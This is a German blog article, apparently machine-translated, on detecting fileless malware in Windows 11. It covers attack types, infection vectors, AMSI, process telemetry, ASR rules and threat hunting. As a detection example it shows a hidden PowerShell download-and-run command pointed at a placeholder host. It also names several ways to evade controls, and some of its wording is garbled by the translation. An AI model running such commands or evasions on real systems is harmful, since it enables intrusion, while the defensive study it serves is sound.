- Dateilose Malware arbeitet im Arbeitsspeicher und missbraucht legitime Prozesse wie PowerShell und WMI.
- Eine effektive Erkennung erfordert die Überwachung von Verhaltensweisen und die Analyse des Speichers, nicht nur von Dateien.
- AMSI, Prozesstelemetrie, Regeln zur Oberflächenreduzierung und proaktive Suche sind Schlüsselfunktionen in Windows 11.
- Persistenz in WMI, Registry und MBR sowie in Firmware und USB erweitert die Angriffsfläche.
¿Wie erkennt man gefährliche dateilose Malware? Die Aktivität dateiloser Angriffe hat deutlich zugenommen, und zu allem Übel Windows 11 ist nicht immunDieser Ansatz umgeht die Festplatte und greift auf den Arbeitsspeicher und legitime Systemtools zurück; deshalb stoßen signaturbasierte Antivirenprogramme an ihre Grenzen. Wenn Sie nach einer zuverlässigen Erkennungsmethode suchen, liegt die Lösung in der Kombination verschiedener Ansätze. Telemetrie, Verhaltensanalyse und Windows-Steuerelemente.
Im aktuellen Ökosystem existieren Kampagnen, die PowerShell, WMI oder Mshta missbrauchen, neben ausgefeilteren Techniken wie Memory Injection, Persistenz „ohne Zugriff auf die Festplatte“ und sogar Firmware-MissbrauchDer Schlüssel liegt darin, die Bedrohungslandschaft, die Angriffsphasen und die Spuren, die sie hinterlassen, zu verstehen, selbst wenn alles innerhalb des Arbeitsspeichers (RAM) stattfindet.
Was ist dateilose Malware und warum stellt sie in Windows 11 ein Problem dar?
Wenn wir von „dateilosen“ Bedrohungen sprechen, meinen wir Schadcode, der Sie müssen keine neuen ausführbaren Dateien hinterlegen. im Dateisystem, um zu funktionieren. Es wird üblicherweise in laufende Prozesse injiziert und im RAM ausgeführt, wobei es auf von Microsoft signierte Interpreter und Binärdateien zurückgreift (z. B. PowerShell, WMI, rundll32, mshtaDadurch wird Ihre Spurensuche minimiert und Sie können Suchmaschinen umgehen, die nur nach verdächtigen Dateien suchen.
Sogar Office-Dokumente oder PDFs, die Sicherheitslücken ausnutzen, um Befehle auszuführen, werden als Teil dieses Phänomens betrachtet, denn Aktivierung der Ausführung im Speicher ohne brauchbare Binärdateien für die Analyse zu hinterlassen. Missbrauch von Makros und DDE In Office, da der Code in legitimen Prozessen wie WinWord ausgeführt wird.
Angreifer kombinieren Social Engineering (Phishing, Spam-Links) mit technischen Fallen: Der Klick des Benutzers löst eine Kette aus, in der ein Skript die endgültige Nutzlast herunterlädt und im Speicher ausführt. Spuren vermeiden auf der Festplatte. Die Ziele reichen von Datendiebstahl über die Ausführung von Ransomware bis hin zur unbemerkten lateralen Bewegung.

Typologien nach ihrer Position im System: von „rein“ bis hin zu Hybriden
Um Missverständnisse zu vermeiden, ist es hilfreich, Bedrohungen nach ihrem Interaktionsgrad mit dem Dateisystem zu unterscheiden. Diese Kategorisierung verdeutlicht die Unterschiede. Was bleibt bestehen, wo ist der Code gespeichert und welche Spuren hinterlässt er?.
Typ I: Keine Dateiaktivität
Vollständig dateilose Malware schreibt nichts auf die Festplatte. Ein klassisches Beispiel ist die Ausnutzung einer Sicherheitslücke. Netzwerkschwachstelle (ähnlich dem EternalBlue-Vektor damals), um eine Hintertür im Kernelspeicher zu implementieren (Fälle wie DoublePulsar). Hierbei findet alles im RAM statt, und es werden keine Spuren im Dateisystem hinterlassen.
Eine weitere Möglichkeit besteht darin, die Firmware von Komponenten wie BIOS/UEFI, Netzwerkadaptern, USB-Peripheriegeräten (BadUSB-artige Techniken) oder sogar CPU-Subsystemen. Sie bleiben auch nach Neustarts und Neuinstallationen bestehen, was die Sache zusätzlich erschwert. Nur wenige Produkte prüfen die Firmware.Es handelt sich um komplexe Angriffe, die zwar seltener vorkommen, aber aufgrund ihrer Heimlichkeit und Widerstandsfähigkeit gefährlich sind.
Typ II: Indirekte Archivierungstätigkeit
Hierbei hinterlässt die Malware keine eigene ausführbare Datei, sondern nutzt systemverwaltete Container, die im Wesentlichen als Dateien gespeichert werden. Beispielsweise Backdoors, die … Powershell-Befehle Im WMI-Repository kann die Ausführung mithilfe von Ereignisfiltern ausgelöst werden. Die Installation über die Befehlszeile ist ohne das Ablegen von Binärdateien möglich, jedoch befindet sich das WMI-Repository als eigenständige Datenbank auf der Festplatte, was eine Bereinigung ohne Systembeeinträchtigung erschwert.
Aus praktischer Sicht gelten sie als dateilos, da dieser Container (WMI, Registry usw.) Es handelt sich nicht um eine klassische, erkennbare ausführbare Datei. Und die Beseitigung ist nicht trivial. Das Ergebnis: eine unauffällige Persistenz mit kaum „traditionellen“ Spuren.
Typ III: Benötigt Dateien zum Funktionieren
In einigen Fällen wird ein 'dateilose' Persistenz Logisch betrachtet benötigen sie einen dateibasierten Auslöser. Ein typisches Beispiel ist Kovter: Es registriert ein Shell-Verb für eine zufällige Dateiendung; wird eine Datei mit dieser Endung geöffnet, startet ein kleines Skript mit mshta.exe, das die schädliche Zeichenkette aus der Registry rekonstruiert.
Der Clou ist, dass diese „Köder“-Dateien mit zufälligen Dateiendungen keine analysierbare Nutzlast enthalten und der Großteil des Codes sich im … befindet. Anmeldung (ein weiterer Container). Deshalb werden sie hinsichtlich ihrer Auswirkungen als dateilos kategorisiert, obwohl sie streng genommen von einem oder mehreren Festplattenartefakten als Auslöser abhängen.
Infektionsvektoren und „Wirte“: Wo die Infektion eindringt und wo sie sich versteckt
Zur Verbesserung der Erkennung ist es unerlässlich, den Eintrittspunkt und den Wirt der Infektion zu kartieren. Diese Perspektive hilft bei der Entwicklung von spezifische Kontrollen Priorisieren Sie geeignete Telemetriedaten.
Exploits
- Dateibasiert (Typ III): Dokumente, ausführbare Dateien, ältere Flash-/Java-Dateien oder LNK-Dateien können den Browser oder die Engine, die sie verarbeitet, ausnutzen, um Shellcode in den Speicher zu laden. Der erste Angriffsvektor ist eine Datei, die Schadsoftware gelangt jedoch in den Arbeitsspeicher (RAM).
- Netzwerkbasiert (Typ I): Ein Paket, das eine Sicherheitslücke ausnutzt (z. B. in SMB), wird im Benutzermodus oder Kernel ausgeführt. WannaCry hat diesen Ansatz bekannt gemacht. Direkter Speicherladen ohne neue Datei.
Hardware
- Geräte (Typ I): Die Firmware der Festplatte oder Netzwerkkarte kann verändert und Code eingeschleust werden. Schwer zu untersuchen und bleibt außerhalb des Betriebssystems bestehen.
- CPU- und Managementsubsysteme (Typ I): Technologien wie Intels ME/AMT haben Wege aufgezeigt, um Netzwerk und Ausführung außerhalb des BetriebssystemsEs greift auf einem sehr niedrigen Niveau an und verfügt über ein hohes Tarnungspotenzial.
- USB (Typ I): Mit BadUSB können Sie ein USB-Laufwerk so umprogrammieren, dass es sich als Tastatur oder Netzwerkkarte ausgibt und Befehle ausführt oder den Datenverkehr umleitet.
- BIOS / UEFI (Typ I): böswillige Firmware-Umprogrammierung (Fälle wie Mebromi), die vor dem Start von Windows ausgeführt wird.
- Hypervisor (Typ I): Implementierung eines Mini-Hypervisors unterhalb des Betriebssystems, um dessen Existenz zu verschleiern. Selten, aber bereits in Form von Hypervisor-Rootkits beobachtet.
Ausführung und Injektion
- Dateibasiert (Typ III): EXE/DLL/LNK oder geplante Aufgaben, die Injektionen in legitime Prozesse starten.
- Makros (Typ III): VBA in Office kann unter Täuschung und mit Zustimmung des Benutzers Payloads, einschließlich vollständiger Ransomware, dekodieren und ausführen.
- Scripts (Typ II): PowerShell, VBScript oder JScript aus Datei, Befehlszeile, Dienstleistungen, Registrierung oder WMIDer Angreifer kann das Skript in einer Remote-Sitzung eingeben, ohne die Festplatte zu berühren.
- Bootsektor (MBR/Boot) (Typ II): Familien wie Petya überschreiben den Bootsektor, um beim Systemstart die Kontrolle zu erlangen. Dieser befindet sich außerhalb des Dateisystems, ist aber für das Betriebssystem und moderne Lösungen zugänglich, die ihn wiederherstellen können.
Wie dateilose Angriffe funktionieren: Phasen und Signale
Obwohl sie keine ausführbaren Dateien hinterlassen, folgen die Kampagnen einer phasenweisen Logik. Ihr Verständnis ermöglicht die Überwachung. Ereignisse und Beziehungen zwischen Prozessen die Spuren hinterlassen.
- Erster ZugriffPhishing-Angriffe nutzen Links oder Anhänge, kompromittierte Websites oder gestohlene Zugangsdaten. Viele Angriffsketten beginnen mit einem Office-Dokument, das einen Befehl auslöst. Powershell.
- Beständigkeit: Hintertüren über WMI (Filter und Abonnements), Ausführungsschlüssel der Registrierung oder geplante Aufgaben, die Skripte ohne eine neue schädliche Datei neu starten.
- ExfiltrationSobald die Informationen gesammelt sind, werden sie über vertrauenswürdige Prozesse (Browser, PowerShell, bitsadmin) zur Datenmischung aus dem Netzwerk gesendet.
Dieses Muster ist besonders heimtückisch, weil Angriffsindikatoren Sie verstecken sich im Normalen: Kommandozeilenargumente, Prozessverkettung, anomale ausgehende Verbindungen oder der Zugriff auf Injektions-APIs.
Gängige Techniken: vom Gedächtnis zur Aufzeichnung
Die Schauspieler greifen auf eine Reihe von Methoden die die Tarnung optimieren. Es ist hilfreich, die gängigsten zu kennen, um eine effektive Erkennung zu aktivieren.
- Bewohner in Erinnerung: Laden von Nutzdaten in den Speicherbereich eines vertrauenswürdigen Prozesses, der auf die Aktivierung wartet. Rootkits und Hooks Im Kern erhöhen sie den Grad der Verschleierung.
- Dauerhaftigkeit im RegisterVerschlüsselte Datenblöcke werden in Schlüsseln gespeichert und über einen legitimen Launcher (mshta, rundll32, wscript) wiederhergestellt. Das temporäre Installationsprogramm kann sich selbst zerstören, um seinen Speicherbedarf zu minimieren.
- Credential-PhishingMithilfe gestohlener Benutzernamen und Passwörter führt der Angreifer Remote-Shells aus und installiert Schadsoftware. stiller Zugriff in der Registry oder WMI.
- „Dateilose“ RansomwareVerschlüsselung und C2-Kommunikation werden aus dem RAM heraus gesteuert, wodurch die Entdeckungsmöglichkeiten eingeschränkt werden, bis der Schaden sichtbar wird.
- Operationssets: automatisierte Ketten, die Schwachstellen erkennen und nach dem Klick des Benutzers ausschließlich im Speicher befindliche Nutzdaten bereitstellen.
- Dokumente mit Code: Makros und Mechanismen wie DDE, die Befehle auslösen, ohne ausführbare Dateien auf der Festplatte zu speichern.
Branchenstudien haben bereits bemerkenswerte Höchststände aufgezeigt: In einem Zeitraum des Jahres 2018 betrug der Wert Steigerung von mehr als 90% Bei skriptbasierten und PowerShell-Kettenangriffen ist dies ein Zeichen dafür, dass dieser Angriffsvektor aufgrund seiner Effektivität bevorzugt wird.
Die Herausforderung für Unternehmen und Lieferanten: Warum Blockieren nicht ausreicht
Es wäre verlockend, PowerShell zu deaktivieren oder Makros für immer zu verbieten, aber Sie würden den Betrieb lahmlegen.PowerShell ist eine Säule der modernen Administration und Office ist im Geschäftsleben unverzichtbar; blindes Blockieren ist oft nicht praktikabel.
Darüber hinaus gibt es Möglichkeiten, grundlegende Kontrollmechanismen zu umgehen: Ausführen von PowerShell über DLLs und rundll32, Verpacken von Skripten in EXE-Dateien, Bringen Sie Ihre eigene Kopie von PowerShell mit. Oder sie verstecken Skripte sogar in Bildern und extrahieren sie in den Speicher. Daher kann die Verteidigung nicht allein auf der Leugnung der Existenz solcher Werkzeuge beruhen.
Ein weiterer häufiger Fehler ist die vollständige Überlassung der Entscheidung an die Cloud: Wenn der Agent auf eine Antwort vom Server warten muss, Sie verlieren die EchtzeitpräventionTelemetriedaten können hochgeladen werden, um die Informationen anzureichern, aber die Die Schadensbegrenzung muss am Endpunkt erfolgen..
So erkennen Sie dateilose Malware unter Windows 11: Telemetrie und Verhalten
Die Gewinnstrategie ist Prozesse und Speicher überwachenNicht Dateien. Schädliches Verhalten ist stabiler als die Form, die eine Datei annimmt, wodurch es sich ideal für Präventionssysteme eignet.
- AMSI (Antimalware Scan Interface)Es fängt PowerShell-, VBScript- oder JScript-Skripte ab, selbst wenn diese dynamisch im Speicher erstellt werden. Hervorragend geeignet, um verschleierte Zeichenketten vor der Ausführung zu erfassen.
- Prozessüberwachung: Start/Ziel, Prozess-ID, Eltern- und Kindprozesse, Routen, Befehlszeilen und Hashes sowie Ausführungsbäume, um die gesamte Geschichte zu verstehen.
- Gedächtnisanalyse: Erkennung von Injektionen, reflektierenden oder PE-Ladungen ohne Berührung der Festplatte und Überprüfung ungewöhnlicher ausführbarer Bereiche.
- StartersektorschutzKontrolle und Wiederherstellung des MBR/EFI im Falle einer Manipulation.
Im Microsoft-Ökosystem kombiniert Defender for Endpoint AMSI, VerhaltensüberwachungSpeicherscanning und cloudbasiertes maschinelles Lernen werden eingesetzt, um die Erkennung neuer oder verschleierter Varianten zu skalieren. Andere Anbieter verwenden ähnliche Ansätze mit im Kernel integrierten Engines.
Realistisches Beispiel für Korrelation: vom Dokument zu PowerShell
Stellen Sie sich eine Kette von Ereignissen vor, bei der Outlook einen Anhang herunterlädt, Word das Dokument öffnet, aktive Inhalte aktiviert werden und PowerShell mit verdächtigen Parametern gestartet wird. Eine korrekte Telemetrie würde dies aufzeigen. Befehlszeile (z.B. Umgehung der Ausführungsrichtlinie, verstecktes Fenster), Verbindung zu einer nicht vertrauenswürdigen Domäne herstellen und einen untergeordneten Prozess erstellen, der sich in AppData installiert.
Ein Agent mit lokalem Kontext ist dazu fähig Anhalten und Rückwärtsfahren Bösartige Aktivitäten ohne manuelles Eingreifen werden zusätzlich zur Benachrichtigung des SIEM-Systems oder per E-Mail/SMS erfasst. Einige Produkte bieten eine Ebene zur Ursachenanalyse (StoryLine-Modelle), die nicht auf den sichtbaren Prozess (Outlook/Word) verweist, sondern auf die zugrunde liegende Aktivität. vollständiger bösartiger Thread und dessen Ursprung in der umfassenden Bereinigung des Systems.
Ein typisches Befehlsmuster, auf das man achten sollte, könnte folgendermaßen aussehen: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logik ist nicht die exakte Zeichenkette, sondern die Menge der SignaleRichtlinienumgehung, verstecktes Fenster, vollständiger Download und Ausführung im Arbeitsspeicher.
AMSI, Pipeline und Rolle jedes Akteurs: vom Endpunkt bis zum SOC
Über die Erfassung von Skripten hinaus orchestriert eine robuste Architektur Schritte, die die Untersuchung und Reaktion erleichtern. Je mehr Beweise vor der Ausführung des Ladevorgangs vorliegen, desto besser.besser
- SkriptabfangAMSI liefert die Inhalte (auch wenn sie spontan generiert werden) für die statische und dynamische Analyse in einer Malware-Pipeline.
- ProzessereignisseEs werden Prozess-IDs (PIDs), Binärdateien, Hashwerte, Routen und andere Daten erfasst. Argumente, wodurch die Prozessbäume erstellt wurden, die zur endgültigen Ladung führten.
- Erkennung und MeldungDie Erkennungen werden in der Produktkonsole angezeigt und zur Kampagnenvisualisierung an Netzwerkplattformen (NDR) weitergeleitet.
- NutzergarantienSelbst wenn ein Skript in den Speicher injiziert wird, das Framework AMSI fängt es ab in kompatiblen Windows-Versionen.
- Administratorfunktionen: Richtlinienkonfiguration zur Aktivierung der Skriptprüfung, Verhaltensbasierte Blockierung und das Erstellen von Berichten über die Konsole.
- SOC-Arbeit: Extraktion von Artefakten (VM-UUID, Betriebssystemversion, Skripttyp, Initiatorprozess und dessen übergeordneter Prozess, Hashes und Befehlszeilen) zur Rekonstruktion des Verlaufs und Liftregeln Zukunft.
Wenn die Plattform den Export zulässt Speicherpuffer Im Zusammenhang mit der Durchführung können Forscher neue Erkennungsmechanismen generieren und die Abwehr gegen ähnliche Varianten verbessern.
Praktische Maßnahmen in Windows 11: Prävention und Jagd

Neben EDR mit Speicherinspektion und AMSI ermöglicht Windows 11 das Schließen von Angriffsflächen und die Verbesserung der Transparenz mit native Steuerelemente.
- Registrierung und Einschränkungen in PowerShellAktiviert die Protokollierung von Skriptblöcken und Modulen, wendet nach Möglichkeit eingeschränkte Modi an und steuert die Verwendung von Umgehung/Versteckt.
- Regeln zur Reduzierung der Angriffsfläche (ASR): blockiert Skriptstarts durch Office-Prozesse und WMI-Missbrauch/PSExec, wenn nicht erforderlich.
- Office-Makrorichtlinien: Deaktiviert standardmäßig die interne Makrosignatur und strikte Vertrauenslisten; überwacht ältere DDE-Abläufe.
- WMI-Audit und -Registrierung: Überwacht Ereignisabonnements und automatische Ausführungsschlüssel (Run, RunOnce, Winlogon) sowie die Aufgabenerstellung geplant.
- Startup-Schutz: Aktiviert Secure Boot, prüft die MBR/EFI-Integrität und stellt sicher, dass beim Start keine Änderungen vorgenommen wurden.
- Ausbessern und Härten: Schließt ausnutzbare Sicherheitslücken in Browsern, Office-Komponenten und Netzwerkdiensten.
- Bewusstsein: schult Benutzer und technische Teams in Phishing und den entsprechenden Signalen verdeckte Hinrichtungen.
Bei der Suche sollten Sie sich auf Abfragen zu folgenden Themen konzentrieren: Erstellung von Prozessen durch Office in Richtung PowerShell/MSHTA, Argumente mit Downloadstring/DownloaddateiSkripte mit eindeutiger Verschleierung, reflektierenden Einspeisungen und ausgehenden Netzwerken zu verdächtigen TLDs. Diese Signale sollten mit Reputation und Frequenz abgeglichen werden, um Störungen zu reduzieren.
Was kann jedes Triebwerk heute erkennen?
Die Unternehmenslösungen von Microsoft kombinieren AMSI, Verhaltensanalysen, Gedächtnis untersuchen und Bootsektorschutz sowie cloudbasierte ML-Modelle zur Skalierung gegen neue Bedrohungen. Andere Anbieter implementieren Überwachung auf Kernel-Ebene, um schädliche von gutartiger Software zu unterscheiden und Änderungen automatisch rückgängig zu machen.
Ein Ansatz, der auf Hinrichtungsgeschichten Es ermöglicht Ihnen, die eigentliche Ursache zu identifizieren (zum Beispiel einen Outlook-Anhang, der eine Kettenreaktion auslöst) und den gesamten Ablaufbaum zu entschärfen: Skripte, Schlüssel, Aufgaben und zwischengeschaltete Binärdateien, sodass Sie sich nicht an den sichtbaren Symptomen festbeißen.
Häufige Fehler und wie man sie vermeidet

PowerShell ohne alternativen Verwaltungsplan zu blockieren ist nicht nur unpraktisch, sondern es gibt auch Möglichkeiten, es indirekt anzurufenDasselbe gilt für Makros: Entweder man verwaltet sie mit Richtlinien und Signaturen, oder das Unternehmen leidet darunter. Es ist besser, sich auf Telemetrie und Verhaltensregeln zu konzentrieren.
Ein weiterer häufiger Fehler ist die Annahme, dass das Whitelisting von Anwendungen alle Probleme löst: Die dateilose Technologie beruht genau darauf. vertrauenswürdige AppsDie Kontrollbehörde sollte beobachten, was die Jugendlichen tun und wie sie miteinander umgehen, und nicht nur, ob sie erlaubt sind.
Angesichts all dessen verliert dateilose Malware ihren Status als „Geist“, wenn man das überwacht, was wirklich zählt: Verhalten, Gedächtnis und Ursprünge Bei jeder Ausführung. Die Kombination aus AMSI, umfassender Prozesstelemetrie, nativen Windows 11-Steuerelementen und einer EDR-Schicht mit Verhaltensanalyse verschafft Ihnen den entscheidenden Vorteil. Hinzu kommen realistische Richtlinien für Makros und PowerShell, WMI-/Registry-Überwachung und eine Suchfunktion, die Befehlszeilen und Prozessstrukturen priorisiert – so erhalten Sie eine Verteidigung, die diese Angriffsketten unterbricht, bevor sie Schaden anrichten können.
Seit seiner Kindheit begeistert er sich für Technik. Ich liebe es, in der Branche auf dem neuesten Stand zu sein und es vor allem zu kommunizieren. Deshalb widme ich mich seit vielen Jahren der Kommunikation auf Technologie- und Videospiel-Websites. Ich schreibe über Android, Windows, MacOS, iOS, Nintendo oder jedes andere verwandte Thema, das mir in den Sinn kommt.